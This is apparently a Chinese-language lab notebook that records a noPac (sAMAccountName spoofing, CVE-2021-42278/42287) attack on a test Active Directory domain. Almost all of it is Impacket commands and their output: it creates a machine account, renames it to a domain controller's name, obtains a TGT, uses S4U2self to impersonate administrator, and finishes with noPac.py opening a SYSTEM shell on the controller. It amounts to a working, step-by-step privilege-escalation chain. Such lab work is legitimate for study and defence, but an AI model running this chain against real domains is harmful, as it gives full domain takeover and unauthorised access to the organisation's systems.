注:后面需要补全全部实验
(6)S4u2Self带pac
创建机器账户machine6$
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/addcomputer.py -computer-name 'machine6$' -computer-pass 'Az123456@' -dc-ip 10.10.4.2 -method SAMR -debug sec.local/hack:"Az123456@"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account machine6$ with password Az123456@.
将机器账户machine6$的saMAccountName属性修改为WIN2016-DC2
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# python3 renameMachine.py -current-name 'machine6$' -new-name "WIN2016-DC2" -dc-ip 10.10.4.7 sec.local/hack:"Az123456@"
/root/tools/impacket/examples/.venv/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Modifying attribute (sAMAccountName) of object (CN=machine6,CN=Computers,DC=sec,DC=local): (machine6$) -> (WIN2016-DC2)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[*] Target object modified successfully!
以机器账户machine6$身份请求TGT,用户名为saMAccountName属性值
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# /root/.local/bin/getTGT.py -dc-ip WIN2016-DC2.sec.local sec/WIN2016-DC2:"Az123456@"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in WIN2016-DC2.ccache
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# export KRB5CCNAME=WIN2016-DC2.ccache
将机器账户的saMAccountName属性值恢复为machine6$
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# python3 renameMachine.py -current-name 'WIN2016-DC2' -new-name 'machine6$' -dc-ip 10.10.4.7 sec.local/hack:"Az123456@"
/root/tools/impacket/examples/.venv/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Modifying attribute (sAMAccountName) of object (CN=machine6,CN=Computers,DC=sec,DC=local): (WIN2016-DC2) -> (machine6$)
[*] Target object modified successfully!
用上一步的tgt,发起s4u2self协议以administrator身份请求访问WIN2016-DC2的CIFS
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# /root/.local/bin/getST.py -spn cifs/WIN2016-DC2.sec.local sec/WIN2016-DC2@10.10.4.7 -k -no-pass -dc-ip 10.10.4.7 -impersonate administrator -self
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating administrator
[*] When doing S4U2self only, argument -spn is ignored
[*] Requesting S4U2self
[*] Saving ticket in administrator@WIN2016-DC2@SEC.LOCAL.ccache
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# export KRB5CCNAME=administrator@WIN2016-DC2@SEC.LOCAL.ccache
nopac
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/noPac]
└─# python3 noPac.py sec.local/test2:"Az123456@" -dc-ip 10.10.4.7 -shell
/root/tools/noPac/.venv/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: WIN2019-DC1
[*] 1: WIN2016-DC2
[*] 2: WIN2019-DC3
>>> Your choice: 1
[*] Selected Target win2016-dc2.sec.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-WVRCFEPNZDR$"
[*] MachineAccount "WIN-WVRCFEPNZDR$" password = kbDBN@ar#Oal
[*] Successfully added machine account WIN-WVRCFEPNZDR$ with password kbDBN@ar#Oal.
[*] WIN-WVRCFEPNZDR$ object = CN=WIN-WVRCFEPNZDR,CN=Computers,DC=sec,DC=local
[*] WIN-WVRCFEPNZDR$ sAMAccountName == win2016-dc2
[*] Saving a DC's ticket in win2016-dc2.ccache
[*] Reseting the machine account to WIN-WVRCFEPNZDR$
[*] Restored WIN-WVRCFEPNZDR$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_win2016-dc2.sec.local.ccache
[*] Attempting to del a computer with the name: WIN-WVRCFEPNZDR$
[-] Delete computer WIN-WVRCFEPNZDR$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>